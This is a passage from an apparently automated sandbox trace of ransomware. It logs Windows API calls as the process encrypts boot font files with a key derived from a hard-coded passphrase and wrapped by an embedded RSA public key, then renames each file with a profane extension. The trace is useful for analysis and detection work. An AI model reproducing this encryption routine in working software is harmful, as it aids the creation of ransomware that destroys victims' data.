returned 0 [0231.397] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.gsg")) returned 0 [0231.397] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.fuck")) returned 0 [0231.397] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.397] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.397] CryptReleaseContext (hProv=0x276b910, dwFlags=0x0) returned 1 [0231.397] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.397] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.397] GetLastError () returned 0x5 [0231.397] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0231.398] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.398] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.398] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.399] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.399] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b448) returned 1 [0231.400] CryptCreateHash (in: hProv=0x276b448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.400] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.400] CryptHashData (hHash=0x394d28, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.400] CryptDeriveKey (in: hProv=0x276b448, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.401] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.401] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.401] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b910) returned 1 [0231.401] CryptImportPublicKeyInfo (in: hCryptProv=0x276b910, dwCertEncodingType=0x1, pInfo=0x2760c70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760ca0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760ca8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3945e8) returned 1 [0231.401] CryptEncrypt (in: hKey=0x3945e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.401] CryptEncrypt (in: hKey=0x3945e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b800*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b800*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.402] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b800, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.402] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276dea8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276dea8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.402] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276dea8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276dea8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.402] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276dea8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.402] CloseHandle (hObject=0xffffffff) returned 1 [0231.402] CloseHandle (hObject=0xffffffff) returned 1 [0231.402] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), bFailIfExists=0) returned 0 [0231.402] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.402] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.gsg")) returned 0 [0231.402] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.fuck")) returned 0 [0231.403] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.403] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.403] CryptReleaseContext (hProv=0x276b448, dwFlags=0x0) returned 1 [0231.403] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.403] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.403] GetLastError () returned 0x5 [0231.403] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0231.403] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.404] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.404] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.404] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.404] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b6f0) returned 1 [0231.406] CryptCreateHash (in: hProv=0x276b6f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.406] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.406] CryptHashData (hHash=0x394d28, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.406] CryptDeriveKey (in: hProv=0x276b6f0, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.406] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.406] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.406] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b4d0) returned 1 [0231.407] CryptImportPublicKeyInfo (in: hCryptProv=0x276b4d0, dwCertEncodingType=0x1, pInfo=0x2760860*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760890*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760898*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394628) returned 1 [0231.407] CryptEncrypt (in: hKey=0x394628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.407] CryptEncrypt (in: hKey=0x394628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b3c0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b3c0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.407] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b3c0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.407] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276feb0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276feb0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.407] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276feb0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276feb0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.407] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276feb0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.407] CloseHandle (hObject=0xffffffff) returned 1 [0231.407] CloseHandle (hObject=0xffffffff) returned 1 [0231.407] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), bFailIfExists=0) returned 0 [0231.407] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.408] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.gsg")) returned 0 [0231.408] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.fuck")) returned 0 [0231.408] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.408] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.408] CryptReleaseContext (hProv=0x276b6f0, dwFlags=0x0) returned 1 [0231.408] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.408] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.408] GetLastError () returned 0x5 [0231.408] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf")) returned 0x20 [0231.409] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.410] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.410] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.410] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.410] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276bc40) returned 1 [0231.412] CryptCreateHash (in: hProv=0x276bc40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.412] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.412] CryptHashData (hHash=0x394be8, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.412] CryptDeriveKey (in: hProv=0x276bc40, Algid=0x6610, hBaseData=0x394be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.412] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.412] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.412] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b448) returned 1 [0231.412] CryptImportPublicKeyInfo (in: hCryptProv=0x276b448, dwCertEncodingType=0x1, pInfo=0x275fd00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275fd30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275fd38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394668) returned 1 [0231.412] CryptEncrypt (in: hKey=0x394668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.412] CryptEncrypt (in: hKey=0x394668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276c080*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276c080*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.412] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276c080, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.413] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276feb0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276feb0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.413] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276feb0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276feb0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.413] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276feb0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.413] CloseHandle (hObject=0xffffffff) returned 1 [0231.413] CloseHandle (hObject=0xffffffff) returned 1 [0231.413] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), bFailIfExists=0) returned 0 [0231.413] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.413] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.gsg")) returned 0 [0231.413] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\malgunn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf.fuck")) returned 0 [0231.413] CryptDestroyHash (hHash=0x394be8) returned 1 [0231.414] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.414] CryptReleaseContext (hProv=0x276bc40, dwFlags=0x0) returned 1 [0231.414] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.414] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.414] GetLastError () returned 0x5 [0231.414] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf")) returned 0x20 [0231.414] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.415] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.415] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.415] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg", dwFileAttributes=0x2) returned 0 [0231.415] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.417] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.417] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.417] CryptHashData (hHash=0x394d28, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.417] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.417] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.417] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.417] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276bd50) returned 1 [0231.417] CryptImportPublicKeyInfo (in: hCryptProv=0x276bd50, dwCertEncodingType=0x1, pInfo=0x2760d40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760d70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760d78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x393fa8) returned 1 [0231.417] CryptEncrypt (in: hKey=0x393fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.418] CryptEncrypt (in: hKey=0x393fa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276bdd8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276bdd8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.418] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276bdd8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.418] ReadFile (in: hFile=0xffffffff, lpBuffer=0x276feb0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x276feb0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.418] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276feb0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x276feb0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.418] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276feb0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.418] CloseHandle (hObject=0xffffffff) returned 1 [0231.418] CloseHandle (hObject=0xffffffff) returned 1 [0231.418] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), bFailIfExists=0) returned 0 [0231.418] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf", dwFileAttributes=0x0) returned 0 [0231.418] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.gsg")) returned 0 [0231.418] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.fuck")) returned 0 [0231.419] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.419] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.419] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.419] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.419] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.419] GetLastError () returned 0x5 [0231.419] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf")) returned 0x20 [0231.419] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf", dwFileAttributes=0x80) returned 0 [0231.419] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.419] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg" (normalized: 